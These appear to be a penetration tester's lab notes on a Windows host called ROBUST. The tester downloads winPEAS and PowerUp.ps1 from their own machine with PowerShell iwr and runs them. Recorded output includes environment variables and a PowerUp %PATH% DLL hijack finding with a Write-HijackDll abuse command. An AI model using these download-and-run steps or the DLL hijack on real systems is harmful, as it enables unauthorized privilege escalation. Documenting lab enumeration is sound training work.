Robust_Automated

PEAS

---

Conducting an automated enumeration after performing a manual enumeration on the robust host.

PS C:\Users\Jeff> iwr -Uri http://192.168.45.182/winPEASany.exe -OutFile .\winPEASany.exe 

Delivery complete

Executing PEAS

ENV

---

╔══════════╣ User Environment Variables
╚ Check for some passwords or keys in the env variables 
    SystemDrive: C:
    ProgramFiles(x86): C:\Program Files (x86)
    Path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSS
H\;C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\WindowsApps;C:\Users\Jeff\AppData\Local\Microsoft\WindowsApps;      
    ProgramW6432: C:\Program Files
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    TMP: C:\Users\Jeff\AppData\Local\Temp
    PROCESSOR_ARCHITECTURE: AMD64
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
    PROCESSOR_REVISION: 0101
    TEMP: C:\Users\Jeff\AppData\Local\Temp
    USERPROFILE: C:\Users\Jeff
    USER: jeff
    TERM: xterm-256color
    USERNAME: jeff
    SystemRoot: C:\WINDOWS
    OneDrive: C:\Users\Jeff\OneDrive
    CommonProgramFiles: C:\Program Files\Common Files
    LOGNAME: jeff
    ProgramData: C:\ProgramData
    HOMEPATH: \Users\Jeff
    COMPUTERNAME: ROBUST
    ALLUSERSPROFILE: C:\ProgramData
    SSH_CONNECTION: 192.168.45.182 57272 192.168.107.200 22
    SHELL: c:\windows\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData
    HOMEDRIVE: C:
    windir: C:\WINDOWS
    NUMBER_OF_PROCESSORS: 2
    OS: Windows_NT
    ProgramFiles: C:\Program Files
    ComSpec: C:\WINDOWS\system32\cmd.exe
    HOME: C:\Users\Jeff
    PSModulePath: C:\Users\Jeff\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\Windo
wsPowerShell\v1.0\Modules
    PROMPT: jeff@ROBUST $P$G
    SSH_CLIENT: 192.168.45.182 57272 22
    APPDATA: C:\Users\Jeff\AppData\Roaming
    USERDOMAIN: WORKGROUP
    PROCESSOR_LEVEL: 25
    LOCALAPPDATA: C:\Users\Jeff\AppData\Local
    CommonProgramW6432: C:\Program Files\Common Files
    SSH_TTY: windows-pty
    PSExecutionPolicyPreference: Bypass
    CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
    PUBLIC: C:\Users\Public
 
╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables 
    ComSpec: C:\WINDOWS\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData
    OS: Windows_NT
    Path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSS
H\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    PROCESSOR_ARCHITECTURE: AMD64
    PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
    TEMP: C:\WINDOWS\TEMP
    TMP: C:\WINDOWS\TEMP
    USERNAME: SYSTEM
    windir: C:\WINDOWS
    NUMBER_OF_PROCESSORS: 2
    PROCESSOR_LEVEL: 25
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    PROCESSOR_REVISION: 0101

N/A

---

UAC

---

PowerShell

---

C:\Users\Jeff\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

NTLM

---

Token Privileges

---

Enumerated

PowerUp

---

PS C:\Users\Jeff> iwr -Uri http://192.168.45.182/PowerUp.ps1 -OutFile .\PowerUp.ps1

Delivery complete

PS C:\Users\Jeff> . .\PowerUp.ps1
PS C:\Users\Jeff> Invoke-AllChecks
Get-WmiObject : Access denied 
 
ModifiablePath    : C:\Users\Jeff\AppData\Local\Microsoft\WindowsApps
IdentityReference : ROBUST\Jeff
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\Jeff\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\Jeff\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\Jeff\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll